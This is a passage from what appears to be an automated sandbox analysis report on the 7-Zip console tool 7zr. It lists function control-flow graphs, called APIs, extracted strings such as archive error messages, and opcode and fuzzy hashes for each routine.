                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: ExceptionThrowfputs$BufferConsoleH_prologHandleInfoScreen
                                              • String ID: $ || $Codecs:$Formats:$Hashers:$KSNFMGOPBELHXCc+a+m+r+$P$offset=$N
                                              • API String ID: 377453556-3661318601
                                              • Opcode ID: 61d68a67c96ddd2ad1a27faa74414c56b3017ac2a1ba6951ec3bc446389c5fa7
                                              • Instruction ID: 2a061c8f6c88e4920ff2c99342814a26698cf799dc0ac0ce1683823018c78dca
                                              • Opcode Fuzzy Hash: 61d68a67c96ddd2ad1a27faa74414c56b3017ac2a1ba6951ec3bc446389c5fa7
                                              • Instruction Fuzzy Hash: 9A22BD31D00218DFDF14EFA4E895BADBBB1EF58314F24009AE544AB292CB359A85DF71
                                              Function 00D01ADE Relevance: 40.5, APIs: 16, Strings: 7, Instructions: 288COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 672 d01ade-d01b14 call d8fb10 call cf13f5 677 d01b32-d01b8b _fileno _isatty _fileno _isatty _fileno _isatty 672->677 678 d01b16-d01b2d call d11d73 _CxxThrowException 672->678 680 d01b9d-d01b9f 677->680 681 d01b8d-d01b91 677->681 678->677 682 d01ba0-d01bcd 680->682 681->680 684 d01b93-d01b97 681->684 685 d01bf9-d01c12 682->685 686 d01bcf-d01bf8 call d01ea4 call cf27bb call cf1e40 682->686 684->680 687 d01b99-d01b9b 684->687 689 d01c20 685->689 690 d01c14-d01c18 685->690 686->685 687->682 693 d01c27-d01c2b 689->693 690->689 692 d01c1a-d01c1e 690->692 692->689 692->693 695 d01c34-d01c3e 693->695 696 d01c2d 693->696 698 d01c40-d01c43 695->698 699 d01c49-d01c53 695->699 696->695 698->699 700 d01c55-d01c58 699->700 701 d01c5e-d01c68 699->701 700->701 703 d01c73-d01c79 701->703 704 d01c6a-d01c6d 701->704 706 d01cc9-d01cd2 703->706 707 d01c7b-d01c87 703->707 704->703 710 d01cd4-d01ce6 706->710 711 d01cea call d01eb9 706->711 708 d01c95-d01ca1 call d01ed1 707->708 709 d01c89-d01c93 707->709 718 d01cc0-d01cc3 708->718 719 d01ca3-d01cbb call d11d73 _CxxThrowException 708->719 709->706 710->711 714 d01cef-d01cf8 711->714 716 d01d37-d01d40 714->716 717 d01cfa-d01d0a 714->717 723 d01e93-d01ea1 716->723 724 d01d46-d01d52 716->724 720 d01d10 717->720 721 d01dc2-d01dd4 wcscmp 717->721 718->706 719->718 725 d01d17-d01d1f call cf9399 720->725 721->725 727 d01dda-d01de6 call d01ed1 721->727 724->723 728 d01d58-d01d93 call cf26dd call cf280c call cf3221 call cf3bbf 724->728 725->716 737 d01d21-d01d32 call d76a60 call cf9313 725->737 727->725 735 d01dec-d01e04 call d11d73 _CxxThrowException 727->735 756 d01d95-d01d9c 728->756 757 d01d9f-d01da3 728->757 744 d01e09-d01e0c 735->744 737->716 747 d01e31-d01e4a call d01f0c GetCurrentProcess SetProcessAffinityMask 744->747 748 d01e0e 744->748 761 d01e83-d01e92 call cf3172 call cf1e40 747->761 762 d01e4c-d01e82 GetLastError call cf3221 call cf58a9 call cf31e5 call cf1e40 747->762 751 d01e10-d01e12 748->751 752 d01e14-d01e2c call d11d73 _CxxThrowException 748->752 751->747 751->752 752->747 756->757 757->744 760 d01da5-d01dbd call d11d73 _CxxThrowException 757->760 760->721 761->723 762->761
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D01AE3
                                                • Part of subcall function 00CF13F5: __EH_prolog.LIBCMT ref: 00CF13FA
                                              • _CxxThrowException.MSVCRT(?,00DA6010), ref: 00D01B2D
                                              • _fileno.MSVCRT ref: 00D01B3E
                                              • _isatty.MSVCRT ref: 00D01B47
                                              • _fileno.MSVCRT ref: 00D01B5D
                                              • _isatty.MSVCRT ref: 00D01B60
                                              • _fileno.MSVCRT ref: 00D01B73
                                              • _CxxThrowException.MSVCRT(?,00DA6010), ref: 00D01CBB
                                              • _CxxThrowException.MSVCRT(?,00DA6010), ref: 00D01DBD
                                              • wcscmp.MSVCRT ref: 00D01DCA
                                              • _CxxThrowException.MSVCRT(?,00DA6010), ref: 00D01E04
                                              • _isatty.MSVCRT ref: 00D01B76
                                                • Part of subcall function 00D11D73: __EH_prolog.LIBCMT ref: 00D11D78
                                              • _CxxThrowException.MSVCRT(?,00DA6010), ref: 00D01E2C
                                              • GetCurrentProcess.KERNEL32(00000000,00000000,?,Set process affinity mask: ,?), ref: 00D01E3B
                                              • SetProcessAffinityMask.KERNEL32(00000000), ref: 00D01E42
                                              • GetLastError.KERNEL32(?,Set process affinity mask: ,?), ref: 00D01E4C
                                              Strings
                                              • : ERROR : , xrefs: 00D01E52
                                              • Unsupported switch postfix for -slp, xrefs: 00D01DF1
                                              • Set process affinity mask: , xrefs: 00D01D74
                                              • unsupported value -stm, xrefs: 00D01E19
                                              • SeLockMemoryPrivilege, xrefs: 00D01D28
                                              • Unsupported switch postfix -bb, xrefs: 00D01CA8
                                              • Unsupported switch postfix -stm, xrefs: 00D01DAA
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: ExceptionThrow$H_prolog_fileno_isatty$Process$AffinityCurrentErrorLastMaskwcscmp
                                              • String ID: : ERROR : $SeLockMemoryPrivilege$Set process affinity mask: $Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp$unsupported value -stm
                                              • API String ID: 1826148334-1115009270
                                              • Opcode ID: dea5c35e329ee3037ffdc5f4f9aa44d05899b887358b30cb88e2e4fb8b607e06
                                              • Instruction ID: 225ad0dbfb7923f22942b4d13d09d38f92a8569b1e56960fb7b219ed2dd8ab57
                                              • Opcode Fuzzy Hash: dea5c35e329ee3037ffdc5f4f9aa44d05899b887358b30cb88e2e4fb8b607e06
                                              • Instruction Fuzzy Hash: 6CC1B135900345EFEB11EFA8C889BEDBBF1AF09304F088459E49997292CB74E944CB35
                                              Function 00D28012 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 240COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 777 d28012-d28032 call d8fb10 780 d28285 777->780 781 d28038-d2806c fputs call d28341 777->781 782 d28287-d28295 780->782 785 d280c8-d280cd 781->785 786 d2806e-d28071 781->786 787 d280d6-d280df 785->787 788 d280cf-d280d4 785->788 789 d28073-d28089 fputs call cf1fa0 786->789 790 d2808b-d2808d 786->790 793 d280e2-d28110 call d28341 call d28622 787->793 788->793 789->785 791 d28096-d2809f 790->791 792 d2808f-d28094 790->792 795 d280a2-d280c7 call cf2e47 call d285c6 call cf1e40 791->795 792->795 804 d28112-d28119 call d2831f 793->804 805 d2811e-d2812f call d28565 793->805 795->785 804->805 805->782 812 d28135-d2813f 805->812 813 d28141-d28148 call d282bb 812->813 814 d2814d-d2815b 812->814 813->814 814->782 817 d28161-d28164 814->817 818 d281b6-d281c0 817->818 819 d28166-d28186 817->819 820 d28276-d2827f 818->820 821 d281c6-d281e1 fputs 818->821 823 d28298-d2829d 819->823 824 d2818c-d28196 call d28565 819->824 820->780 820->781 821->820 827 d281e7-d281fb 821->827 828 d282b1-d282b9 SysFreeString 823->828 829 d2819b-d2819d 824->829 830 d28273 827->830 831 d281fd-d2821f 827->831 828->782 829->823 832 d281a3-d281b4 SysFreeString 829->832 830->820 834 d28221-d28245 831->834 835 d2829f-d282a1 831->835 832->818 832->819 838 d282a3-d282ab call cf965d 834->838 839 d28247-d28271 call d284a7 call cf965d SysFreeString 834->839 836 d282ae 835->836 836->828 838->836 839->830 839->831
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D28017
                                              • fputs.MSVCRT ref: 00D2804D
                                                • Part of subcall function 00D28341: __EH_prolog.LIBCMT ref: 00D28346
                                                • Part of subcall function 00D28341: fputs.MSVCRT ref: 00D2835B
                                                • Part of subcall function 00D28341: fputs.MSVCRT ref: 00D28364
                                              • fputs.MSVCRT ref: 00D2807A
                                                • Part of subcall function 00CF1FA0: fputc.MSVCRT ref: 00CF1FA7
                                                • Part of subcall function 00CF965D: VariantClear.OLEAUT32(?), ref: 00CF967F
                                              • SysFreeString.OLEAUT32(00000000), ref: 00D281AA
                                              • fputs.MSVCRT ref: 00D281CD
                                              • SysFreeString.OLEAUT32(00000000), ref: 00D28267
                                              • SysFreeString.OLEAUT32(00000000), ref: 00D282B1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: fputs$FreeString$H_prolog$ClearVariantfputc
                                              • String ID: --$----$Path$Type$Warning: The archive is open with offset
                                              • API String ID: 2889736305-3797937567
                                              • Opcode ID: 926825d50e13556b67ef8d62efd5d20e54f69510909baf3dcd38834a7262afa6
                                              • Instruction ID: eab2fe4b639cd3084ff36294423ba2cad122e681a8c263aecb63d84409cbadfb
                                              • Opcode Fuzzy Hash: 926825d50e13556b67ef8d62efd5d20e54f69510909baf3dcd38834a7262afa6
                                              • Instruction Fuzzy Hash: 38919831A01229EFCF14DFA4E980AAEB7B5FF68314F244129E512E7291DB70AD05DB74
                                              Function 00D26766 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 135COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 846 d26766-d26792 call d8fb10 EnterCriticalSection 849 d26794-d26799 call d2c7d7 846->849 850 d267af-d267b7 846->850 857 d2679e-d267ac 849->857 852 d267b9 call cf1f91 850->852 853 d267be-d267c3 850->853 852->853 855 d26892-d268a8 853->855 856 d267c9-d267d5 853->856 860 d26941 855->860 861 d268ae-d268b4 855->861 858 d26817-d2682f 856->858 859 d267d7-d267dd 856->859 857->850 864 d26873-d2687b 858->864 865 d26831-d26842 call cf1fa0 858->865 859->858 862 d267df-d267eb 859->862 866 d26943-d2695a 860->866 861->860 863 d268ba-d268c2 861->863 869 d267f3-d26801 862->869 870 d267ed 862->870 867 d26933-d2693f call d2c5cd 863->867 871 d268c4-d268e6 call cf1fa0 fputs 863->871 864->867 868 d26881-d26887 864->868 865->864 883 d26844-d2686c fputs call cf2201 865->883 867->866 868->867 873 d2688d 868->873 869->864 875 d26803-d26815 fputs 869->875 870->869 886 d268fb-d26917 call d04f2a call cf1fb3 call cf1e40 871->886 887 d268e8-d268f9 fputs 871->887 879 d2692e call cf1f91 873->879 881 d2686e call cf1fa0 875->881 879->867 881->864 883->881 889 d2691c-d26928 call cf1fa0 886->889 887->889 889->879
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D2676B
                                              • EnterCriticalSection.KERNEL32(00DB2938), ref: 00D26781
                                              • fputs.MSVCRT ref: 00D2680B
                                              • LeaveCriticalSection.KERNEL32(00DB2938), ref: 00D26944
                                                • Part of subcall function 00D2C7D7: fputs.MSVCRT ref: 00D2C840
                                              • fputs.MSVCRT ref: 00D26851
                                                • Part of subcall function 00CF2201: fputs.MSVCRT ref: 00CF221E
                                              • fputs.MSVCRT ref: 00D268D9
                                              • fputs.MSVCRT ref: 00D268F6
                                                • Part of subcall function 00CF1FA0: fputc.MSVCRT ref: 00CF1FA7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: fputs$CriticalSection$EnterH_prologLeavefputc
                                              • String ID: v$Sub items Errors:
                                              • API String ID: 2670240366-2468115448
                                              • Opcode ID: b47773ea7ddd2cfadc4cac98671abee26ff5a7b2f67fef3840c66686b2d8ea88
                                              • Instruction ID: 6f23a3a6ee044bdd9e9437315250bdd505368be17a479ab41e41af06994bd90b
                                              • Opcode Fuzzy Hash: b47773ea7ddd2cfadc4cac98671abee26ff5a7b2f67fef3840c66686b2d8ea88
                                              • Instruction Fuzzy Hash: 02519C32501700CFCB259FA4E894AAAB7E2FF94314F58442EE59A97261CB31BC84DF65
                                              Function 00D26359 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 252COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 898 d26359-d26373 call d8fb10 901 d26375-d26385 call d2c7d7 898->901 902 d2639e-d263af call d25a4d 898->902 901->902 907 d26387-d2639b 901->907 908 d263b5-d263cd 902->908 909 d265ee-d265f1 902->909 907->902 912 d263d2-d263d4 908->912 913 d263cf 908->913 910 d265f3-d265fb 909->910 911 d26624-d2663c 909->911 914 d26601-d26607 call d28012 910->914 915 d266ea call d2c5cd 910->915 916 d26643-d2664b 911->916 917 d2663e call cf1f91 911->917 918 d263d6-d263d9 912->918 919 d263df-d263e7 912->919 913->912 928 d2660c-d2660e 914->928 927 d266ef-d266fd 915->927 916->915 924 d26651-d2668f fputs call cf211a call cf1fa0 call d28685 916->924 917->916 918->919 923 d264b1-d264bc call d26700 918->923 925 d26411-d26413 919->925 926 d263e9-d263f2 call cf1fa0 919->926 947 d264c7-d264cf 923->947 948 d264be-d264c1 923->948 924->927 981 d26691-d26697 924->981 929 d26442-d26446 925->929 930 d26415-d2641d 925->930 926->925 943 d263f4-d2640c call cf210c call cf1fa0 926->943 928->927 934 d26614-d2661f call cf1fa0 928->934 938 d26497-d2649f 929->938 939 d26448-d26450 929->939 935 d2642a-d2643b 930->935 936 d2641f-d26425 call d26134 930->936 934->915 935->929 936->935 938->923 944 d264a1-d264ac call cf1fa0 call cf1f91 938->944 949 d26452-d2647a fputs call cf1fa0 call cf1fb3 call cf1fa0 939->949 950 d2647f-d26490 939->950 943->925 944->923 956 d264d1-d264da call cf1fa0 947->956 957 d264f9-d264fb 947->957 948->947 955 d265a2-d265a6 948->955 949->950 950->938 964 d265da-d265e6 955->964 965 d265a8-d265b6 955->965 956->957 986 d264dc-d264f4 call cf210c call cf1fa0 956->986 961 d2652a-d2652e 957->961 962 d264fd-d26505 957->962 974 d26530-d26538 961->974 975 d2657f-d26587 961->975 971 d26512-d26523 962->971 972 d26507-d2650d call d26134 962->972 964->908 968 d265ec 964->968 976 d265d3 965->976 977 d265b8-d265ca call d26244 965->977 968->909 971->961 972->971 983 d26567-d26578 974->983 984 d2653a-d26562 fputs call cf1fa0 call cf1fb3 call cf1fa0 974->984 975->955 980 d26589-d26595 call cf1fa0 975->980 976->964 977->976 1001 d265cc-d265ce call cf1f91 977->1001 980->955 1003 d26597-d2659d call cf1f91 980->1003 991 d26699-d2669f 981->991 992 d266df-d266e5 call cf1f91 981->992 983->975 984->983 986->957 998 d266b3-d266ce call d04f2a call cf1fb3 call cf1e40 991->998 999 d266a1-d266b1 fputs 991->999 992->915 1004 d266d3-d266da call cf1fa0 998->1004 999->1004 1001->976 1003->955 1004->992
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D2635E
                                              • fputs.MSVCRT ref: 00D2645F
                                                • Part of subcall function 00D2C7D7: fputs.MSVCRT ref: 00D2C840
                                              • fputs.MSVCRT ref: 00D26547
                                              • fputs.MSVCRT ref: 00D2665F
                                              • fputs.MSVCRT ref: 00D266AE
                                                • Part of subcall function 00CF1F91: fflush.MSVCRT ref: 00CF1F93
                                                • Part of subcall function 00CF1FB3: __EH_prolog.LIBCMT ref: 00CF1FB8
                                                • Part of subcall function 00CF1E40: free.MSVCRT ref: 00CF1E44
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: fputs$H_prolog$fflushfree
                                              • String ID: Can't allocate required memory$ERRORS:$WARNINGS:
                                              • API String ID: 1750297421-1898165966
                                              • Opcode ID: 89ada80ab9359d8dc8c92dc2982214fad7433f29d6dd81dbaf20b3b81e04281e
                                              • Instruction ID: af817b0fcbfdfcd840e4b1e814c9e1daac2ae0907af6c4700fc7a94c6d1ae8cd
                                              • Opcode Fuzzy Hash: 89ada80ab9359d8dc8c92dc2982214fad7433f29d6dd81dbaf20b3b81e04281e
                                              • Instruction Fuzzy Hash: D2B18F30601715CFDB64EFA4D991BAAB7E1FF54308F08452DEA5A87291CB31ED44CB61
                                              Function 00CF9C8F Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 47libraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1016 cf9c8f-cf9cc2 GetModuleHandleA GetProcAddress 1017 cf9cef-cf9d06 GlobalMemoryStatus 1016->1017 1018 cf9cc4-cf9ccc GlobalMemoryStatusEx 1016->1018 1020 cf9d0b-cf9d0d 1017->1020 1021 cf9d08 1017->1021 1018->1017 1019 cf9cce-cf9cd7 1018->1019 1022 cf9cd9 1019->1022 1023 cf9ce5 1019->1023 1024 cf9d11-cf9d15 1020->1024 1021->1020 1025 cf9cdb-cf9cde 1022->1025 1026 cf9ce0-cf9ce3 1022->1026 1027 cf9ce8-cf9ced 1023->1027 1025->1023 1025->1026 1026->1027 1027->1024
                                              APIs
                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 00CF9CB3
                                              • GetProcAddress.KERNEL32(00000000), ref: 00CF9CBA
                                              • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00CF9CC8
                                              • GlobalMemoryStatus.KERNEL32(?), ref: 00CF9CFA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus$AddressHandleModuleProc
                                              • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                                              • API String ID: 180289352-802862622
                                              • Opcode ID: 7e0d515e734129edbd591d7d67044894f106d64727031f36a0f63b99096bbeee
                                              • Instruction ID: fd9fe15af3c1e57a9155d377b987990e5807ff5129a800568401a3000ff0c06e
                                              • Opcode Fuzzy Hash: 7e0d515e734129edbd591d7d67044894f106d64727031f36a0f63b99096bbeee
                                              • Instruction Fuzzy Hash: 3E1123709103099BDF60EFA4D899BEDBBF8FB04305F200419E546A7284D778A984CB65
                                              Function 00D8FF3A Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: _initterm$__getmainargs__p___initenv__p__commode__p__fmode__set_app_type
                                              • String ID:
                                              • API String ID: 4012487245-0
                                              • Opcode ID: 1b17769a4e5c1cf110f2ca4ee8b93bcfb34bdde6aeba88bd9563cd154b3c5fe9
                                              • Instruction ID: 946f8fbe74ea220a378df6e179af679a81201797b0a73da1f2ff7912f1f4f77a
                                              • Opcode Fuzzy Hash: 1b17769a4e5c1cf110f2ca4ee8b93bcfb34bdde6aeba88bd9563cd154b3c5fe9
                                              • Instruction Fuzzy Hash: 0B21F472900748EFCB11AFA4EC46BA9BBB8FB09720F14431AF615E23A1DB745444CB34
                                              Function 00D8FFB1 Relevance: 10.5, APIs: 7, Instructions: 43COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: _initterm$FilterXcpt__getmainargs__p___initenv__setusermatherr_controlfpexit
                                              • String ID:
                                              • API String ID: 279829931-0
                                              • Opcode ID: c1945b075e83ba22f7233a7b5649866c9b016258321cd486a6e054c1e29770c1
                                              • Instruction ID: fb5ecf65f800f83db28cc4b22f1976425b7ff325c13b0285e6c800566b33d374
                                              • Opcode Fuzzy Hash: c1945b075e83ba22f7233a7b5649866c9b016258321cd486a6e054c1e29770c1
                                              • Instruction Fuzzy Hash: 9001D3B2950708EFDF04AFA0EC46DEEBB79FB08300B10011AF906B2361DA759844CB30
                                              Function 00D11858 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 213COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D1185D
                                                • Part of subcall function 00D1021A: __EH_prolog.LIBCMT ref: 00D1021F
                                                • Part of subcall function 00D1062E: __EH_prolog.LIBCMT ref: 00D10633
                                              • _CxxThrowException.MSVCRT(?,00DA6010), ref: 00D11961
                                                • Part of subcall function 00D11AA5: __EH_prolog.LIBCMT ref: 00D11AAA
                                              Strings
                                              • Duplicate archive path:, xrefs: 00D11A8D
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog$ExceptionThrow
                                              • String ID: Duplicate archive path:
                                              • API String ID: 2366012087-4000988232
                                              • Opcode ID: 1444e412240914eb33e2ba7d93162361de1dd24212469533a12406418a3e49f8
                                              • Instruction ID: ce7479ae39311aaa471b29a06a64a56c58819c36030fd551acbcf257b28d8203
                                              • Opcode Fuzzy Hash: 1444e412240914eb33e2ba7d93162361de1dd24212469533a12406418a3e49f8
                                              • Instruction Fuzzy Hash: A1814835D00158EBCF15EFA4E891AEDBBB5EF18310F1440A9E612632A2DF30AE45DB71
                                              Function 00D3F1B2 Relevance: 7.7, APIs: 5, Instructions: 168COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1520 d3f1b2-d3f1ce call d8fb10 call d01168 1524 d3f1d3-d3f1d5 1520->1524 1525 d3f1db-d3f1e4 call d3f3e4 1524->1525 1526 d3f36a-d3f378 1524->1526 1529 d3f1e6-d3f1e8 1525->1529 1530 d3f1ed-d3f1f2 1525->1530 1529->1526 1531 d3f203-d3f21a 1530->1531 1532 d3f1f4-d3f1f9 1530->1532 1535 d3f231-d3f248 memcpy 1531->1535 1536 d3f21c-d3f22c _CxxThrowException 1531->1536 1532->1531 1533 d3f1fb-d3f1fe 1532->1533 1533->1526 1537 d3f24c-d3f257 1535->1537 1536->1535 1538 d3f259 1537->1538 1539 d3f25c-d3f25e 1537->1539 1538->1539 1540 d3f281-d3f299 1539->1540 1541 d3f260-d3f26f 1539->1541 1549 d3f311-d3f313 1540->1549 1550 d3f29b-d3f2a0 1540->1550 1542 d3f271 1541->1542 1543 d3f279-d3f27b 1541->1543 1544 d3f273-d3f275 1542->1544 1545 d3f277 1542->1545 1543->1540 1546 d3f315-d3f318 1543->1546 1544->1543 1544->1545 1545->1543 1548 d3f357-d3f368 1546->1548 1548->1526 1549->1548 1550->1546 1551 d3f2a2-d3f2b5 call d3f37b 1550->1551 1555 d3f2f0-d3f30c memmove 1551->1555 1556 d3f2b7-d3f2cf call d8e1a0 1551->1556 1555->1537 1559 d3f2d1-d3f2eb call d3f37b 1556->1559 1560 d3f31a-d3f355 memcpy 1556->1560 1559->1556 1564 d3f2ed 1559->1564 1560->1548 1564->1555
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: a461cc2b60e2135933284db7856cc4ec02d5e8c28b9765974116d8c0d3c4b187
                                              • Instruction ID: 2ec879674d9035bada4cc38b2ab5013376848cab60b9da1bd6ed6467b3cfa91e
                                              • Opcode Fuzzy Hash: a461cc2b60e2135933284db7856cc4ec02d5e8c28b9765974116d8c0d3c4b187
                                              • Instruction Fuzzy Hash: 1D514C7AE003099FDB14DFA4C8C5BAEB3B5FF88354F188429E901AB241D7B4A9058B70
                                              Function 00CF6C72 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 398COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
